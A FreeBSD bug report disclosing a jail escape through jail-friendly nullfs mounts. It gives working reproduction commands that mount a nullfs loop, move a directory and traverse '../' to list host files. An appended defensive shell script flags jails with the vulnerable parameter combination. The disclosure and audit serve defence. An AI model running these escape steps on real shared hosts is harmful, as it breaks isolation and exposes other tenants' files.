[Bug 262180] jail escaping via jail-friendly nullfs

From: <bugzilla-noreply_at_freebsd.org>
Date: Thu, 24 Feb 2022 23:43:32 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=262180

            Bug ID: 262180
           Summary: jail escaping via jail-friendly nullfs
           Product: Base System
           Version: 12.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: firk@cantconnect.ru

A jail could be escaped when run with enforce_statfs<2, allow.mount=true,
allow.mount.nullfs=true.

prepare jail environment
> mkdir /j/1
> tar -c -f - /bin /lib /libexec /sbin | tar -x -f - -C /j/1
> mkdir /j/1/tmp

start a vulnerable jail
> jail -c path=/j/1 persist=false allow.mount=true allow.mount.nullfs=true enforce_statfs=1 command=/bin/sh

malicious code
> mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d
> mount -t nullfs /tmp/a/b/c /tmp/a/d
> cd /tmp/a/d/test
> mv /tmp/a/b/c/test /tmp/a/b/test
> ls -al ../../../../..
> ls -al ../../../../../..

You will see the files outside the jail.
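A host-side audit for the parameter combination the report names (enforce_statfs below 2 together with allow.mount and allow.mount.nullfs enabled), added here as an example; it is not part of the bug report or of FreeBSD's own tooling. It assumes the one-jail-per-line "name=value ..." output format of `jls -n`, accepts booleans as either 1/0 or true/false, and runs on constructed sample lines so it works offline; on a FreeBSD host you would pipe live `jls -n` output into it instead.

```shell
#!/bin/sh
# Added example (not from the bug report): flag jails whose parameters match
# the escapable combination described above. Input: one jail per line in the
# "name=value name=value ..." form assumed to be what `jls -n` prints.

# is_true VALUE -> exit 0 when VALUE means "enabled" (1 or true).
is_true() {
    case "$1" in
        1|true) return 0 ;;
        *)      return 1 ;;
    esac
}

# jail_nullfs_escape_risk "LINE" -> exit 0 when LINE describes a jail with
# enforce_statfs<2, allow.mount enabled and allow.mount.nullfs enabled;
# exit 1 otherwise. Parameters missing from LINE take the jail(8) defaults
# (enforce_statfs=2, mounts disallowed), which do not match the risky set.
jail_nullfs_escape_risk() {
    enforce_statfs=2
    allow_mount=0
    allow_nullfs=0
    for kv in $1; do
        case "$kv" in
            enforce_statfs=*)     enforce_statfs=${kv#*=} ;;
            allow.mount=*)        allow_mount=${kv#*=} ;;
            allow.mount.nullfs=*) allow_nullfs=${kv#*=} ;;
        esac
    done
    [ "$enforce_statfs" -lt 2 ] || return 1
    is_true "$allow_mount"      || return 1
    is_true "$allow_nullfs"     || return 1
    return 0
}

# audit_jails reads jail lines on stdin, prints one RISK line per match and
# exits 0 when no jail matched, 2 when at least one did.
audit_jails() {
    found=0
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        if jail_nullfs_escape_risk "$line"; then
            found=1
            name=$(printf '%s\n' "$line" | tr ' ' '\n' | sed -n 's/^name=//p')
            printf 'RISK: jail %s allows nullfs mounts with enforce_statfs<2; set enforce_statfs=2 or allow.mount.nullfs=false\n' "${name:-?}"
        fi
    done
    [ "$found" -eq 0 ] || return 2
}

# Constructed sample lines in the assumed `jls -n` format (not real output).
SAMPLE_JAILS='jid=1 name=web path=/j/web enforce_statfs=2 allow.mount=1 allow.mount.nullfs=1
jid=2 name=build path=/j/build enforce_statfs=1 allow.mount=1 allow.mount.nullfs=1
jid=3 name=db path=/j/db enforce_statfs=1 allow.mount=0 allow.mount.nullfs=0'

# On a FreeBSD host, use live data instead of the sample:
#   jls -n jid name path enforce_statfs allow.mount allow.mount.nullfs | audit_jails
if printf '%s\n' "$SAMPLE_JAILS" | audit_jails; then
    echo "no jail in the risky configuration"
fi
```

Only the second sample jail is reported: the first keeps enforce_statfs=2 and the third has mounting disabled, which are the two parameter changes that take a jail out of the combination the report describes.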
